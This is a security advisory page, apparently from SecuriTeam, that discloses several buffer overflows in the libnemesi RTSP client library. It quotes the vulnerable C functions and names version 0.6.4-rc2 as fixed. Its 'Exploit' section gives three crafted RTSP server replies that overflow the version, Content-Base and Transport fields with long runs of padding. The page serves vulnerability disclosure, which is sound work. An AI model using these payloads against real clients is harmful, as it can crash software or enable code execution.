SecuriTeam™ - libnemesi Multiple Vulnerabilities

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam™
Beyond Security®

SecuriTeam™ Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

Black Box Testing
Vulnerability Assessment
Vulnerability Scanner

	SecuriTeam™ in Your Inbox

	E-mail this article to a friend

New vulnerability?
New tool?
Tell us

libnemesi is "an open source client library for implementing the RTSP/RTP streaming playback easily. The library has been written by the Italian team of the Politecnico di Torino University for the LScube project". Multiple buffer overflow vulnerabilities have been discovered in libnemesi.

Credit:
The information has been provided by Luigi Auriemma.
The original article can be found at: http://aluigi.altervista.org/adv/libnemesibof-adv.txt

Audit your web server for security holes - see what the hackers see.
Sign up for a scan today - risk free!

Vulnerable Systems:
* libnemesi version 0.6.4-rc1 and prior

Immune Systems:
* libnemesi version 0.6.4-rc2

Buffer overflow in handle_rtsp_pkt
handle_rtsp_pkt is the function used for checking the server's reply, it uses a buffer of 32 bytes called ver for containing the version sent by the server (like HTTP/1.0) using a sscanf without size limitations.

From rtsp/rtsp_handlers.c:

int handle_rtsp_pkt(rtsp_thread * rtsp_th)
{
    char ver[32];
    int opcode;
    ...
    if (sscanf((rtsp_th->in_buffer).data, "%s ", ver) < 1) {
    ...

The same bug exists also in the check_status function located in rtsp_internals.c but naturally can't be reached since handle_rtsp_pkt is called (and exploited) for first.

Buffer overflow in the send_*_request functions
The send_*_request functions available in rtsp/rtsp_send.c (send_pause_request, send_play_request, send_setup_request and send_teardown_request) are vulnerable to various buffer-overflow vulnerabilities caused by the usage of buffers initialized using 256 bytes plus the size of one parameter without considering all the others received by the server like, for example, Content-Base.

Buffer overflow in get_transport_str_*
Another buffer-overflow vulnerability is available in the get_transport_str_sctp, get_transport_str_tcp and get_transport_str_udp functions in which is used strncpy in a wrong way. In fact the size parameter is not referred to the size of the destination buffer but to the source one.

From rtsp/rtsp_transport.c:

int get_transport_str_sctp(rtp_session * rtp_sess, char * tkna, char * tknb) {
    char str[256];
    uint16_t stream;
    do {
        if ((tkna = strstrcase(tknb, "server_streams"))) {
            for (; (*tkna == ' ') || (*tkna != '='); tkna++);
            for (tknb = tkna++; (*tknb == ' ') || (*tknb != '-');
                 tknb++);

            strncpy(str, tkna, tknb - tkna);
            ...

Exploit:
bof1:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaa 200

bof2:
RTSP/1.0 200 OK
Cseq: 1
Content-length: 44
Content-Type: application/sdp
Content-Base: rtsp://localhost/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

m=audio 0 RTP/AVP 96
m=video 0 RTP/AVP 97

bof3:
RTSP/1.0 200 OK
Cseq: 1
Content-length: 44
Content-Type: application/sdp
Content-Base: rtsp://localhost/file.ext

m=audio 0 RTP/AVP 96
m=video 0 RTP/AVP 97
RTSP/1.0 200 OK
Cseq: 2
Session: 2873109947796720585
Transport: RTP/AVP/TCP;interleaved=999_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa-

	Apache HTTP Server mod_proxy_ftp Wildcard Characters Cross-Site Scripting
	Dreambox DM500 Webserver Long URL Request Denial of Service
	Multiple Vulnerabilities in AWStats Totals
	vBulletin Cross Site Scripting Vulnerability (popup)
	Calendarix Basic Two SQL Injection Vulnerabilities
	Multiple Heap Overflows in Xine-Lib
	OpenLDAP BER Decoding Remote DoS Vulnerability
	Vim Netrw FTP User Name and Password Disclosure
	Solaris snoop SMB Multiple Vulnerabilities
	Libxslt Heap-Based Buffer Overflow
	Apache Tomcat XSS Vulnerability
	Apple Mac OS X CoreGraphics PDF Type1 Font Integer Overflow Vulnerability
	Ingres Database for Linux Multiple Vulnerabilities
	SAP MaxDB dbmsrv Untrusted Execution Path Vulnerability
	Asterisk IAX 'POKE' Resource Exhaustion